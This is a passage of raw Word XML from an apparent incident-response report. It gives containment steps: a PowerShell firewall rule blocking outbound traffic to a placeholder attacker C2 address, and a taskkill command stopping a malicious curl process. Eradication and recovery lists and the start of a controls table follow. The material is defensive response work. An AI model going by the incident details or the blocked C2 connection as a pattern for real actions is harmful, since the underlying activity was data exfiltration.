        <w:t>Block outbound traffic to &lt;ATTACKER_IP&gt;, the C2 IP address</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4591"/>
        <w:gridCol w:w="4591"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F0180" w14:paraId="4E8464B3" w14:textId="77777777" w:rsidTr="000F0180">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9182" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="31EC3A46" w14:textId="7DB2136E" w:rsidR="000F0180" w:rsidRDefault="00102484" w:rsidP="000F0180">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>New-NetFirewallRule -DisplayName "Block Outbound to &lt;ATTACKER_IP&gt;" -Direction Outbound -RemoteAddress &lt;ATTACKER_IP&gt; -Action Block</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F0180" w14:paraId="07B11595" w14:textId="77777777" w:rsidTr="000F0180">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4817F5A1" w14:textId="596BC988" w:rsidR="000F0180" w:rsidRDefault="00D21B8D" w:rsidP="000F0180">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>New-NetFirewallRule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A36E9B8" w14:textId="3C745AA1" w:rsidR="000F0180" w:rsidRDefault="00832108" w:rsidP="000F0180">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To create a new rule in Windows Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F0180" w14:paraId="63ADF832" w14:textId="77777777" w:rsidTr="000F0180">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FF7516A" w14:textId="08F60D24" w:rsidR="000F0180" w:rsidRDefault="00D21B8D" w:rsidP="000F0180">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-DisplayName "Block Outbound to &lt;ATTACKER_IP&gt;"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DFB1052" w14:textId="43BE9C4D" w:rsidR="000F0180" w:rsidRDefault="00832108" w:rsidP="000F0180">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The rule name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F0180" w14:paraId="1D1CAE5A" w14:textId="77777777" w:rsidTr="000F0180">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51CAE21D" w14:textId="3F43F351" w:rsidR="000F0180" w:rsidRDefault="00D21B8D" w:rsidP="000F0180">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-Direction Outbound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F514DA5" w14:textId="794DB230" w:rsidR="000F0180" w:rsidRDefault="00832108" w:rsidP="000F0180">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The traffic direction is set to Outbound which means the traffic that is leaving the system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21B8D" w14:paraId="6366A745" w14:textId="77777777" w:rsidTr="000F0180">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="315CE710" w14:textId="448AA9CB" w:rsidR="00D21B8D" w:rsidRPr="00102484" w:rsidRDefault="00D21B8D" w:rsidP="000F0180">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-RemoteAddress &lt;ATTACKER_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54192328" w14:textId="0078BB71" w:rsidR="00D21B8D" w:rsidRDefault="00832108" w:rsidP="000F0180">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The destination IP address to match</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A02F4C" w14:paraId="63E746AA" w14:textId="77777777" w:rsidTr="000F0180">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3286B41D" w14:textId="3A8ECC63" w:rsidR="00A02F4C" w:rsidRDefault="00A02F4C" w:rsidP="000F0180">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-Action Block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74B8782D" w14:textId="6AF69F01" w:rsidR="00A02F4C" w:rsidRDefault="00832108" w:rsidP="000F0180">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To block the connection if the IP matches</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E37387F" w14:textId="0B4D9C3B" w:rsidR="00AA46E5" w:rsidRDefault="511508E8" w:rsidP="511508E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>End the malicious task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB1D538" w14:textId="6EE56E5C" w:rsidR="511508E8" w:rsidRDefault="511508E8" w:rsidP="511508E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Use Task Manager to check if the curl task is still running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B9AC49" w14:textId="65FA49A4" w:rsidR="511508E8" w:rsidRDefault="511508E8" w:rsidP="511508E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The following command ends the curl task if it is still running</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4591"/>
        <w:gridCol w:w="4591"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA46E5" w14:paraId="4D517A95" w14:textId="77777777" w:rsidTr="00732B3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9182" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="6405CB34" w14:textId="7739405B" w:rsidR="00AA46E5" w:rsidRDefault="00AA46E5" w:rsidP="00AA46E5">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>taskkill /IM curl.exe /F</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA46E5" w14:paraId="1E1A18D7" w14:textId="77777777" w:rsidTr="00AA46E5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26614431" w14:textId="60B216E9" w:rsidR="00AA46E5" w:rsidRDefault="00AA46E5" w:rsidP="00AA46E5">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>taskkill</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C81E423" w14:textId="6891DC2F" w:rsidR="00AA46E5" w:rsidRDefault="00832108" w:rsidP="00AA46E5">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Windows command to terminate a running process</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA46E5" w14:paraId="66903BBB" w14:textId="77777777" w:rsidTr="00AA46E5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4496865E" w14:textId="4722F58D" w:rsidR="00AA46E5" w:rsidRDefault="00AA46E5" w:rsidP="00AA46E5">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/IM curl.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DAD9093" w14:textId="17298ED8" w:rsidR="00AA46E5" w:rsidRDefault="00832108" w:rsidP="00AA46E5">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Specify the program to kill, curl.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA46E5" w14:paraId="7EE6B9CE" w14:textId="77777777" w:rsidTr="00AA46E5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17C91CA2" w14:textId="7DCED5A3" w:rsidR="00AA46E5" w:rsidRDefault="00AA46E5" w:rsidP="00AA46E5">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/F</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="195C243B" w14:textId="664162BD" w:rsidR="00AA46E5" w:rsidRDefault="00832108" w:rsidP="00AA46E5">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To force the process to stop immediately</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="685351DA" w14:textId="58234D24" w:rsidR="00AA46E5" w:rsidRPr="00AA46E5" w:rsidRDefault="00AA46E5" w:rsidP="2BFA4357">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5496950E" w14:textId="2F9606CD" w:rsidR="00AA46E5" w:rsidRPr="0044124E" w:rsidRDefault="2BFA4357" w:rsidP="2BFA4357">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Eradication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54391ED0" w14:textId="54A5A905" w:rsidR="00194137" w:rsidRDefault="2BFA4357" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Remove any malicious scripts, payloads or persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E90DD40" w14:textId="29AC8DE1" w:rsidR="00046DFA" w:rsidRPr="00046DFA" w:rsidRDefault="00046DFA" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Review accessed files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1979FD58" w14:textId="16A50A27" w:rsidR="00046DFA" w:rsidRPr="00046DFA" w:rsidRDefault="2BFA4357" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Reset affected credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130086E2" w14:textId="4F51B617" w:rsidR="0044124E" w:rsidRDefault="0044124E" w:rsidP="2BFA4357">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50F14E23" w14:textId="6761765F" w:rsidR="0044124E" w:rsidRPr="0044124E" w:rsidRDefault="2BFA4357" w:rsidP="2BFA4357">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625798F3" w14:textId="1EEE453B" w:rsidR="00B8236E" w:rsidRPr="00046DFA" w:rsidRDefault="2BFA4357" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Monitor outbound traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756CBF4F" w14:textId="2A03AE51" w:rsidR="0044124E" w:rsidRDefault="2BFA4357" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Reconnect to the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAEF972" w14:textId="5DCBD8AA" w:rsidR="0044124E" w:rsidRPr="00046DFA" w:rsidRDefault="2BFA4357" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Conduct post-incident activity which is the next stage of the incident response lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55938B2D" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="00B8236E" w:rsidP="00B8236E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="184F2294" w14:textId="02FCE142" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="2BFA4357" w:rsidP="2BFA4357">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc220896710"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Control/Mitigation </w:t>
      </w:r>
      <w:commentRangeStart w:id="61"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
      <w:commentRangeEnd w:id="61"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="61"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9182" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1418"/>
        <w:gridCol w:w="2392"/>
        <w:gridCol w:w="2538"/>
        <w:gridCol w:w="2834"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C64DB" w14:paraId="423627EC" w14:textId="7B02BA49" w:rsidTr="6BBFDBE2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1149665C" w14:textId="64950821" w:rsidR="004C64DB" w:rsidRPr="00595EB4" w:rsidRDefault="004C64DB" w:rsidP="00595EB4">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47E89F5A" w14:textId="32085A6E" w:rsidR="004C64DB" w:rsidRPr="00595EB4" w:rsidRDefault="004C64DB" w:rsidP="00595EB4">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2538" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73377F56" w14:textId="3BBE262C" w:rsidR="004C64DB" w:rsidRPr="00595EB4" w:rsidRDefault="004C64DB" w:rsidP="00595EB4">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2834" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D987100" w14:textId="6E72629D" w:rsidR="1E0EC8B7" w:rsidRDefault="530B04A8" w:rsidP="1E0EC8B7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C64DB" w14:paraId="5655EA35" w14:textId="0003D817" w:rsidTr="6BBFDBE2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32A6559D" w14:textId="4E23015B" w:rsidR="004C64DB" w:rsidRDefault="004C64DB" w:rsidP="65116661">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Egress filtering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="322F2973" w14:textId="78176C80" w:rsidR="004C64DB" w:rsidRDefault="006D13F1" w:rsidP="006D13F1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
